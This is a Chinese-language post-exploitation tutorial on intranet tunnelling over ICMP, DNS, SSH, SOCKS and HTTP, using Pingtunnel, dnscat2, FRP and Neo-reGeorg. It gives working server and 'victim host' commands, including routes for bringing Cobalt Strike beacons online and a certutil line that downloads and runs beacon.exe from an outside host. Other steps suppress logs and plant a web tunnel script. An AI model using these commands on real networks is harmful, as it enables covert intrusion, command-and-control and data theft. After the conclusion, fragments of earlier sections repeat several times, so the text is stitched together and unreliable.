内网隧道技术详解<\/h1>

一、前言<\/h2>
内网隧道(Intranet tunnel)指的是通过网络隧道的方式，将内网的服务映射到公网上，从而使得外部主机可以访问内网资源。在后渗透阶段，内网隧道的搭建可以帮助攻击者在内部网络中进行更加隐蔽和灵活的操作，从而更好地实现攻击目标。网络隧道还可以帮助我们绕过内网防御、横向渗透、数据转移、隐藏攻击行为。<\/p>

二、ICMP隧道<\/h2>

1. ICMP协议简介<\/h3>
ICMP(Internet Control Message Protocol)Internet控制报文协议，用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。ICMP通过PING命令访问远程计算机，建立ICMP隧道，将TCP\/UDP数据封装到ICMP的PING数据包中，从而穿过防火墙，因为防火墙一般不会屏蔽PING数据包，实现不受限制的访问。<\/p>

2. 隧道搭建工具<\/h3>
使用Pingtunnel工具，项目地址: https:\/\/github.com\/esrrhs\/pingtunnel<\/p>
Pingtunnel把tcp\/udp\/sock5流量伪装成icmp流量进行转发的工具，跨平台。<\/p>

服务端配置(VPS):<\/h4>

sudo .\/pingtunnel -type server -key [<\/span>密钥,只限数字]<\/span>
<\/span><\/span>sudo .\/pingtunnel -type server -key 000000<\/span>
<\/span><\/span><\/code><\/pre>客户端配置(受害主机):<\/h4>
pingtunnel.exe -type client -l :[<\/span>转发本机2222端口作为ICMP隧道通讯端口]<\/span> -s [<\/span>服务端IP]<\/span> -[<\/span>转发类型]<\/span> 1<\/span> -noprint 1<\/span> -nolog 1<\/span>
<\/span><\/span>pingtunnel.exe -type client -l :2222 -s 1.x.x.x -sock5 1<\/span> -noprint 1<\/span> -nolog 1<\/span>
<\/span><\/span><\/code><\/pre>流量转发示例:<\/h4>
# ICMP转发为TCP<\/span>
<\/span><\/span>pingtunnel.exe -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455 -tcp 1<\/span>
<\/span><\/span>
<\/span><\/span># ICMP转发为UDP<\/span>
<\/span><\/span>pingtunnel.exe -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455
<\/span><\/span><\/code><\/pre>3. 利用方式<\/h3>
Pingtunnel上线Cobaltstrike<\/h4>


搭建ICMP隧道<\/p>

服务端: sudo .\/pingtunnel -type server -key 000000<\/code><\/li>
客户端: pingtunnel.exe -type client -l 127.0.0.1:2222 -s 1.x.x.x -t x.x.x.x:3333 -tcp 1 -noprint 1 -nolog 1 -key 000000<\/code><\/li>
<\/ul>
<\/li>

Cobaltstrike新建两个监听:<\/p>

一个为转发ICMP的2222端口(host为127.0.0.1)<\/li>
另一个监听端口为ICMP流量转发到VPS的服务端口3333<\/li>
<\/ul>
<\/li>

生成cs马并执行，流量通过ICMP隧道间接上线<\/p>
<\/li>
<\/ol>
Pingtunel配合iox代理socks出网<\/h4>

服务端搭建ICMP隧道: sudo .\/pingtunnel -type server -noprint 1 -nolog 1 -key 000000<\/code><\/li>
客户端启动Pingtunnel: pingtunnel.exe -type client -l 127.0.0.1:3389 -s 1.x.x.x -t 1.x.x.x:3333 -tcp 1 -noprint 1 -nolog 1 -key 000000<\/code><\/li>
服务端启动iox: .\/iox proxy -l 3333 -l 4444<\/code><\/li>
客户端启动iox: iox.exe proxy -r 127.0.0.1:3389<\/code><\/li>
通过proxifier代理socks流量访问内网<\/li>
<\/ol>
三、DNS隧道<\/h2>
1. DNS隧道简介<\/h3>
DNS隧道是将其它协议的内容封装在DNS协议中，以DNS请求和响应包完成传输数据的技术。使用DNS隧道需要使用一个子域名来进行隧道通信。<\/p>
2. 隧道搭建工具<\/h3>
使用dnscat2，项目地址: https:\/\/github.com\/iagox86\/dnscat2<\/p>
配置步骤:<\/h4>

配置子域名解析(添加A记录和NS记录)<\/li>
开放udp、tcp 53端口<\/li>
服务端配置:
cd dnscat2\/server
<\/span><\/span>sudo ruby dnscat2.rb log.xxx.xxx -c 000000<\/span>
<\/span><\/span><\/code><\/pre><\/li>
客户端配置:
dnscat2-v0.07-client-win32.exe --secret=<\/span>000000<\/span> log.xxx.xxx --delay 5000<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. 利用方式<\/h3>
dnscat2上线Cobastrike<\/h4>

Cobastrike启动监听<\/li>
服务端启动: sudo ruby .\/dnscat2.rb log.xxx.xxx -e open -c 000000 --no-cache<\/code><\/li>
客户端启动: dnscat2-v0.07-client-win32.exe --secret=000000 log.xxx.xxx --delay 5000<\/code><\/li>
通过certutil下载并执行beacon上线:
certutil.exe -urlcache -split -f http:\/\/x.x.x.x:4444\/beacon.exe C:\U<\/span>sers\P<\/span>ublic\b<\/span>eacon.exe
<\/span><\/span>C:\U<\/span>sers\P<\/span>ublic\b<\/span>eacon.exe
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
四、SSH隧道<\/h2>
1. SSH隧道简介<\/h3>
SSH隧道(SSH Tunnel)是通过SSH协议建立的安全网络通道，可以将本地计算机和远程服务器之间的通信流量加密传输，用于传输不安全的协议或访问受限资源，还可以用来绕过防火墙限制。<\/p>
2. 隧道类型<\/h3>
本地端口转发<\/h4>
将本地计算机上的端口映射到远程计算机上的技术。<\/p>
配置步骤:<\/p>

跳板机修改ssh配置:
AllowTcpForwarding yes
<\/span><\/span>GatewayPorts yes
<\/span><\/span>PermitRootLogin yes
<\/span><\/span>TCPKeepAlive yes
<\/span><\/span><\/code><\/pre><\/li>
攻击机建立隧道:
ssh -CfNg -L 8888:192.168.20.200:22 funsiooo@192.168.11.128
<\/span><\/span><\/code><\/pre><\/li>
通过本机连接内网主机:
ssh -p 8888<\/span> root@127.0.0.1
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
远程端口转发<\/h4>
将远程计算机上的端口映射到本地计算机上的端口的技术。<\/p>
配置步骤:<\/p>

跳板机执行:
ssh -R 2222:192.168.20.200:22 root@192.168.11.137
<\/span><\/span><\/code><\/pre><\/li>
攻击机访问内网主机:
ssh -p 2222<\/span> root@127.0.0.1
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
动态转发(SOCKS代理)<\/h4>
在本地计算机上设置一个SOCKS代理，通过SSH隧道将网络流量转发到远程服务器上。<\/p>
配置步骤:<\/p>

服务端开启转发功能:
GatewayPorts yes
<\/span><\/span><\/code><\/pre><\/li>
客户端开启本地代理:
ssh -qTfnN -D 0.0.0.0:135 funsiooo@localhost
<\/span><\/span><\/code><\/pre><\/li>
远程转发到公网VPS:
ssh -qTfnN -R 0.0.0.0:2222:0.0.0.0:135 root@公网vps
<\/span><\/span><\/code><\/pre><\/li>
使用Proxifier连接Socks<\/li>
<\/ol>
五、Socks隧道<\/h2>
1. SOCKS协议简介<\/h3>
SOCKS(Socket Secure)是一种网络协议，它允许客户端通过一个代理服务器访问互联网。SOCKS5是最新版本，支持加密认证和数据加密等功能。<\/p>
2. 隧道搭建工具<\/h3>
使用FRP + proxifier实现，项目地址: https:\/\/github.com\/fatedier\/frp<\/p>
服务端配置(frps.ini):<\/h4>
[common]<\/span>
<\/span><\/span>bind_addr<\/span> =<\/span> 0.0.0.0<\/span>
<\/span><\/span>bind_port<\/span> =<\/span> 7000<\/span>
<\/span><\/span>dashboard_addr<\/span> =<\/span> 0.0.0.0<\/span>
<\/span><\/span>dashboard_port<\/span> =<\/span> 7500<\/span>
<\/span><\/span>dashboard_user<\/span> =<\/span> root<\/span>
<\/span><\/span>dashboard_pwd<\/span> =<\/span> root<\/span>
<\/span><\/span>token<\/span> =<\/span> 1q2w3e<\/span>
<\/span><\/span>heartbeat_timeout<\/span> =<\/span> 90<\/span>
<\/span><\/span>max_pool_count<\/span> =<\/span> 5<\/span>
<\/span><\/span><\/code><\/pre>客户端配置(frpc.ini):<\/h4>
[common]<\/span>
<\/span><\/span>tls_enable<\/span> =<\/span> true<\/span>
<\/span><\/span>server_addr<\/span> =<\/span> x.x.x.x<\/span>
<\/span><\/span>server_port<\/span> =<\/span> 7000<\/span>
<\/span><\/span>token<\/span> =<\/span> 1q2w3e<\/span>
<\/span><\/span>pool_count<\/span> =<\/span> 5<\/span>
<\/span><\/span>protocol<\/span> =<\/span> tcp<\/span>
<\/span><\/span>health_check_type<\/span> =<\/span> tcp<\/span>
<\/span><\/span>health_check_interval_s<\/span> =<\/span> 100<\/span>
<\/span><\/span>
<\/span><\/span>[test]<\/span>
<\/span><\/span>remote_port<\/span> =<\/span> 40000<\/span>
<\/span><\/span>plugin<\/span> =<\/span> socks5<\/span>
<\/span><\/span>use_encryption<\/span> =<\/span> true<\/span>
<\/span><\/span>use_compression<\/span> =<\/span> true<\/span>
<\/span><\/span><\/code><\/pre>使用方法:<\/h4>

服务端启动: .\/frps -c frps.ini<\/code><\/li>
客户端启动: frpc.exe -c frpc.ini<\/code><\/li>
使用proxifier连接<\/li>
<\/ol>
3. 利用方式 - frp多级代理<\/h3>


第一层代理搭建:<\/p>

服务端frps.ini配置基本参数<\/li>
客户端frpc.ini配置socks5代理<\/li>
通过proxifier连接第一层代理<\/li>
<\/ul>
<\/li>

第二层网络搭建:<\/p>

跳板机-1上启动frps服务<\/li>
跳板机-2上启动frpc客户端<\/li>
proxifier设置代理链访问第二层内网<\/li>
<\/ul>
<\/li>
<\/ol>
六、HTTP隧道<\/h2>
1. HTTP隧道简介<\/h3>
HTTP隧道是一种使用HTTP协议进行数据传输的技术，它可以将内网中的服务映射到公网地址上，实现内网穿透的功能。<\/p>
2. 隧道搭建工具<\/h3>
使用Neo-reGeorg，项目地址: https:\/\/github.com\/L-codes\/Neo-reGeorg<\/p>
配置步骤:<\/h4>

生成隧道脚本:
python3 neoreg.py generate -k password
<\/span><\/span><\/code><\/pre><\/li>
上传脚本到WEB服务器<\/li>
连接隧道:
python3 neoreg.py -k password -u http:\/\/192.168.11.133:8003\/tunnel.php -p 2333<\/span>
<\/span><\/span><\/code><\/pre><\/li>
利用proxifier连接socks访问内网<\/li>
<\/ol>
七、扩展知识<\/h2>
1. 出网类型检测<\/h3>



协议<\/th>
检测命令<\/th>
<\/tr>
<\/thead>


ICMP<\/td>
ping ip\/domain<\/td>
<\/tr>

HTTP<\/td>
curl ip or domain<\/td>
<\/tr>

DNS<\/td>
nslookup domain 8.8.8.8<\/td>
<\/tr>

TCP\/UDP<\/td>
telnet ip port<\/td>
<\/tr>
<\/tbody>
<\/table>
2. 代理类型<\/h3>

正向代理(Forward Proxy)<\/strong>: 代理服务器向外部网络发送请求，用于内部网络无法直接访问外部网络的情况。<\/li>
反向代理(Reverse Proxy)<\/strong>: 代理服务器向内部网络发送请求，用于外部网络无法直接访问内部网络的情况。<\/li>
<\/ul>
3. 连接类型<\/h3>

正向连接<\/strong>: 客户端向服务器发起连接请求(受害者主机具备公网IP可出网)<\/li>
反向连接<\/strong>: 服务器主动向客户端发起连接请求(内网主机能出网但没有公网IP)<\/li>
<\/ul>
八、总结<\/h2>
通过学习各种隧道技术，可以灵活选择适合的工具和方法实现内网穿透。不同协议和工具有各自的特点和适用场景，需要根据实际网络环境和需求进行选择。关键是要理解各种隧道的工作原理和配置方法，才能在实际渗透测试中灵活运用。<\/p>

协议<\/th>	检测命令<\/th> <\/tr> <\/thead>
ICMP<\/td>	ping ip\/domain<\/td> <\/tr>
HTTP<\/td>	curl ip or domain<\/td> <\/tr>
DNS<\/td>	nslookup domain 8.8.8.8<\/td> <\/tr>
TCP\/UDP<\/td>	telnet ip port<\/td> <\/tr> <\/tbody> <\/table> 2. 代理类型<\/h3> 正向代理(Forward Proxy)<\/strong>: 代理服务器向外部网络发送请求，用于内部网络无法直接访问外部网络的情况。<\/li> 反向代理(Reverse Proxy)<\/strong>: 代理服务器向内部网络发送请求，用于外部网络无法直接访问内部网络的情况。<\/li> <\/ul> 3. 连接类型<\/h3> 正向连接<\/strong>: 客户端向服务器发起连接请求(受害者主机具备公网IP可出网)<\/li> 反向连接<\/strong>: 服务器主动向客户端发起连接请求(内网主机能出网但没有公网IP)<\/li> <\/ul> 八、总结<\/h2> 通过学习各种隧道技术，可以灵活选择适合的工具和方法实现内网穿透。不同协议和工具有各自的特点和适用场景，需要根据实际网络环境和需求进行选择。关键是要理解各种隧道的工作原理和配置方法，才能在实际渗透测试中灵活运用。<\/p>

内网隧道技术详解<\/h1>

二、ICMP隧道<\/h2>

2. 隧道搭建工具<\/h3> 使用Pingtunnel工具，项目地址: https:\/\/github.com\/esrrhs\/pingtunnel<\/p> Pingtunnel把tcp\/udp\/sock5流量伪装成icmp流量进行转发的工具，跨平台。<\/p>

3. 利用方式<\/h3>

三、DNS隧道<\/h2>

1. DNS隧道简介<\/h3> DNS隧道是将其它协议的内容封装在DNS协议中，以DNS请求和响应包完成传输数据的技术。使用DNS隧道需要使用一个子域名来进行隧道通信。<\/p>

2. 隧道搭建工具<\/h3> 使用dnscat2，项目地址: https:\/\/github.com\/iagox86\/dnscat2<\/p>

3. 利用方式<\/h3>

四、SSH隧道<\/h2>

1. SSH隧道简介<\/h3> SSH隧道(SSH Tunnel)是通过SSH协议建立的安全网络通道，可以将本地计算机和远程服务器之间的通信流量加密传输，用于传输不安全的协议或访问受限资源，还可以用来绕过防火墙限制。<\/p>

2. 隧道类型<\/h3>

五、Socks隧道<\/h2>

1. SOCKS协议简介<\/h3> SOCKS(Socket Secure)是一种网络协议，它允许客户端通过一个代理服务器访问互联网。SOCKS5是最新版本，支持加密认证和数据加密等功能。<\/p>

2. 隧道搭建工具<\/h3> 使用FRP + proxifier实现，项目地址: https:\/\/github.com\/fatedier\/frp<\/p>

六、HTTP隧道<\/h2>

1. HTTP隧道简介<\/h3> HTTP隧道是一种使用HTTP协议进行数据传输的技术，它可以将内网中的服务映射到公网地址上，实现内网穿透的功能。<\/p>

2. 隧道搭建工具<\/h3> 使用Neo-reGeorg，项目地址: https:\/\/github.com\/L-codes\/Neo-reGeorg<\/p>

七、扩展知识<\/h2>

2. 隧道搭建工具<\/h3>
使用Pingtunnel工具，项目地址: https:\/\/github.com\/esrrhs\/pingtunnel<\/p>
Pingtunnel把tcp\/udp\/sock5流量伪装成icmp流量进行转发的工具，跨平台。<\/p>

1. DNS隧道简介<\/h3>
DNS隧道是将其它协议的内容封装在DNS协议中，以DNS请求和响应包完成传输数据的技术。使用DNS隧道需要使用一个子域名来进行隧道通信。<\/p>

2. 隧道搭建工具<\/h3>
使用dnscat2，项目地址: https:\/\/github.com\/iagox86\/dnscat2<\/p>

1. SSH隧道简介<\/h3>
SSH隧道(SSH Tunnel)是通过SSH协议建立的安全网络通道，可以将本地计算机和远程服务器之间的通信流量加密传输，用于传输不安全的协议或访问受限资源，还可以用来绕过防火墙限制。<\/p>

1. SOCKS协议简介<\/h3>
SOCKS(Socket Secure)是一种网络协议，它允许客户端通过一个代理服务器访问互联网。SOCKS5是最新版本，支持加密认证和数据加密等功能。<\/p>

2. 隧道搭建工具<\/h3>
使用FRP + proxifier实现，项目地址: https:\/\/github.com\/fatedier\/frp<\/p>

1. HTTP隧道简介<\/h3>
HTTP隧道是一种使用HTTP协议进行数据传输的技术，它可以将内网中的服务映射到公网地址上，实现内网穿透的功能。<\/p>

2. 隧道搭建工具<\/h3>
使用Neo-reGeorg，项目地址: https:\/\/github.com\/L-codes\/Neo-reGeorg<\/p>